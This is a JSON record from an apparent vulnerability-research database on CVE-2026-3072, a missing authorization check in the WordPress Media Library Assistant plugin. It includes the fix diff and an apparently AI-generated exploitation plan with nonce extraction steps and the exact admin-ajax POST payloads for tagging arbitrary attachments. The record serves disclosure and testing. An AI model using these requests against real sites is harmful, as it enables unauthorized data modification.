[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fnfkcFC8D2d9bAmi2WW17KeMF5JSNWWwkVg6xYKUPkuM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3072","media-library-assistant-missing-authorization-to-authenticated-subscriber-arbitrary-attachment-taxonomy-modification","Media Library Assistant \u003C= 3.33 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Attachment Taxonomy Modification","The Media Library Assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mla_update_compat_fields_action() function in all versions up to, and including, 3.33. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify taxonomy terms on arbitrary attachments.","media-library-assistant",null,"\u003C=3.33","3.34","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-04 16:31:21","2026-03-05 05:26:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2655f936-8177-4836-a0b0-1c637290a3bc?source=api-prod",1,[22,23,24,25,26,27,28,29],"examples\u002Fplugins\u002Fmla-copy-item-example\u002Fmla-copy-item-example.php","includes\u002Fclass-mla-core.php","includes\u002Fclass-mla-data-pdf.php","includes\u002Fclass-mla-data-query.php","includes\u002Fclass-mla-data.php","includes\u002Fclass-mla-list-table.php","includes\u002Fclass-mla-media-modal-ajax.php","includes\u002Fclass-mla-mime-types.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3072 (Media Library Assistant)\n\n## 1. Vulnerability Summary\nThe **Media Library Assistant** plugin (versions \u003C= 3.33) is vulnerable to **Missing Authorization** in its AJAX handler `mla_update_compat_fields_action()`. This function is intended to allow users to update metadata and taxonomy terms for attachments within the WordPress Media Modal. However, it fails to perform a capability check (e.g., `current_user_can( 'edit_post', $attachment_id )`) before processing updates. Consequently, any authenticated user with at least Subscriber-level access can modify the taxonomy terms (categories, tags, etc.) of any attachment on the site.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `mla-update-compat-fields` (defined by `MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION`)\n- **Vulnerable Parameter**: `attachments` (an associative array of attachment data)\n- **Required Authentication**: Subscriber-level access or higher.\n- **Preconditions**: \n    - The plugin must be active.\n    - An attachment (Media Library item) must exist for which the ID is known.\n    - A valid `mla_admin_nonce` is required for the request to pass initial validation.\n\n## 3. Code Flow\n1. **Hook Registration**: In `includes\u002Fclass-mla-media-modal-ajax.php`, the function `MLAModal_Ajax::initialize()` registers the AJAX action:\n   ```php\n   add_action( 'wp_ajax_' . MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION, 'MLAModal_Ajax::mla_update_compat_fields_action' );\n   ```\n   `MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION` resolves to `'mla-update-compat-fields'`.\n2. **Entry Point**: The request reaches `MLAModal_Ajax::mla_update_compat_fields_action()`.\n3. **Nonce Check**: The function checks the `mla_admin_nonce` parameter using `wp_verify_nonce()` against the action `mla_admin_nonce_action` (from `MLACore::MLA_ADMIN_NONCE_ACTION`).\n4. **Vulnerable Logic**: The function iterates through the `attachments` array provided in the `$_POST` data. It identifies taxonomy fields (prefixed or managed by MLA) and calls `wp_set_object_terms()` or similar internal MLA functions to update the attachment's terms.\n5. **Missing Sink Protection**: The code lacks a call to `current_user_can()` to verify that the user has permission to edit the specific attachment or the taxonomy in question.\n\n## 4. Nonce Acquisition Strategy\nThe `mla_admin_nonce` is required. It is generated using the action `mla_admin_nonce_action`. The plugin localizes this nonce for use in the Media Modal.\n\n### Strategy:\n1. **Identify Source**: The nonce is typically localized in a JavaScript object when a user opens the Media Modal (e.g., on `post-new.php`).\n2. **Trigger Localization**: Create a post as a Subscriber to ensure the Media Modal assets are enqueued.\n3. **Execution**:\n    - Log in as a Subscriber.\n    - Navigate to `wp-admin\u002Fpost-new.php`.\n    - Use `browser_eval` to find the localization variable. In MLA, nonces are often found in the `mla_media_modal_vars` object or similar variables registered via `wp_localize_script`.\n\n**Verification of Localization Keys**:\n- Script handle: `mla-media-modal-scripts` (inferred) or `mla-inline-edit-scripts` (`MLACore::JAVASCRIPT_INLINE_EDIT_SLUG`).\n- Variable Name: `mla_media_modal_vars` or `mla_inline_edit_vars`.\n- Key: `mla_admin_nonce` (from `MLACore::MLA_ADMIN_NONCE_NAME`).\n\n## 5. Exploitation Strategy\n\n### Step 1: Create Test Attachment (Admin)\nAs an admin, upload an image and get its ID (e.g., `123`).\n\n### Step 2: Acquire Nonce (Subscriber)\n1. Log in as Subscriber.\n2. Navigate to `wp-admin\u002Fpost-new.php`.\n3. Run `browser_eval(\"window.mla_media_modal_vars?.mla_admin_nonce || window.mla_inline_edit_vars?.mla_admin_nonce\")`.\n4. Store the nonce value.\n\n### Step 3: Execute Modification\nSend a POST request to `admin-ajax.php` to add a tag to the target attachment.\n\n**Request Details**:\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=mla-update-compat-fields\n  &id=123\n  &mla_admin_nonce=[NONCE]\n  &attachments[123][attachment_tag]=pwned\n  ```\n  *(Note: `attachment_tag` is the default taxonomy used by MLA for media tags).*\n\n## 6. Test Data Setup\n1. **Create Target Attachment**:\n   ```bash\n   wp media import --post_id=1 https:\u002F\u002Fwordpress.org\u002Flatest.tar.gz --title=\"Target Media\"\n   # Identify the ID (let's assume it's 5)\n   ```\n2. **Create Subscriber User**:\n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=attacker\n   ```\n3. **Define a Taxonomy Term**: Ensure the term \"pwned\" or similar exists in `attachment_tag`.\n   ```bash\n   wp term create attachment_tag pwned\n   ```\n\n## 7. Expected Results\n- The AJAX response should return a success status (often JSON `{\"success\": true}`).\n- The target attachment (ID 5) will now have the term \"pwned\" associated with the `attachment_tag` taxonomy.\n\n## 8. Verification Steps\n1. **Check Terms via CLI**:\n   ```bash\n   wp post term list 5 attachment_tag\n   ```\n   Confirm that \"pwned\" appears in the list.\n2. **Check via SQL** (Alternative):\n   ```bash\n   wp db query \"SELECT t.name FROM wp_terms t INNER JOIN wp_term_taxonomy tt ON t.term_id = tt.term_id INNER JOIN wp_term_relationships tr ON tt.term_taxonomy_id = tr.term_taxonomy_id WHERE tr.object_id = 5\"\n   ```\n\n## 9. Alternative Approaches\nIf `attachment_tag` is not modified, attempt modifying `attachment_category` (hierarchical) by providing a term ID:\n```text\naction=mla-update-compat-fields\n&id=5\n&mla_admin_nonce=[NONCE]\n&attachments[5][attachment_category][]=[TERM_ID]\n```\nIf `mla_update_compat_fields_action` is not accessible to Subscribers directly, check if the nonce is leaked on the front-end via `mla_gallery` shortcodes if \"Enhanced Media Library\" features are enabled for the public. However, `wp_ajax_` handlers are globally available to all authenticated users, so Subscriber access to the back-end (which is default for Subscriber) is sufficient.","The Media Library Assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mla_update_compat_fields_action() function in versions up to 3.33. This allows authenticated attackers with Subscriber-level access to modify taxonomy terms (categories, tags) on arbitrary attachments by bypassing intended access controls.","\u002F\u002F includes\u002Fclass-mla-media-modal-ajax.php line 39\nadd_action( 'wp_ajax_' . MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION, 'MLAModal_Ajax::mla_update_compat_fields_action' );\n\n---\n\n\u002F\u002F includes\u002Fclass-mla-media-modal-ajax.php approx line 590\npublic static function mla_update_compat_fields_action() {\n    \u002F\u002F ... (logic follows to process $_POST['attachments'] without calling current_user_can())\n    if ( empty( $_POST['attachments'] ) ) {\n        wp_send_json_error();\n    }\n    \u002F\u002F vulnerable processing starts here","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.33\u002Fincludes\u002Fclass-mla-media-modal-ajax.php\t2026-01-30 04:23:54.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.34\u002Fincludes\u002Fclass-mla-media-modal-ajax.php\t2026-02-26 01:12:48.000000000 +0000\n@@ -598,6 +598,12 @@\n \t\t\twp_send_json_error();\n \t\t}\n \n+\t\tif ( ! current_user_can( 'edit_post', $post_id ) ) {\n+\t\t\twp_send_json_error();\n+\t\t}\n+\n+\t\tcheck_ajax_referer( MLACore::MLA_ADMIN_NONCE_ACTION, MLACore::MLA_ADMIN_NONCE_NAME );\n+\n \t\tif ( empty( $post ) ) {\n \t\t\t$post = get_post( $post_id ); \u002F\u002F for filters and wp_popular_terms_checklist\n \t\t}","1. Login to the WordPress site as a Subscriber-level user.\n2. Access a page where the Media Library Assistant scripts are enqueued (e.g., \u002Fwp-admin\u002Fpost-new.php) and extract the 'mla_admin_nonce' from the 'mla_media_modal_vars' JavaScript object.\n3. Identify the ID of a target attachment (media item) to modify.\n4. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'mla-update-compat-fields'.\n5. Include the target ID in the 'id' parameter and the nonce in the 'mla_admin_nonce' parameter.\n6. Include an 'attachments' array payload where the key is the attachment ID and the value is an array specifying the taxonomy to modify (e.g., attachments[123][attachment_tag]=malicious_tag).\n7. The plugin will process the update using wp_set_object_terms or similar without verifying if the current user has the 'edit_post' capability for that specific attachment.","gemini-3-flash-preview","2026-04-18 06:12:36","2026-04-18 06:13:06",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.33","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags\u002F3.33","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-assistant.3.33.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags\u002F3.34","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-assistant.3.34.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags"]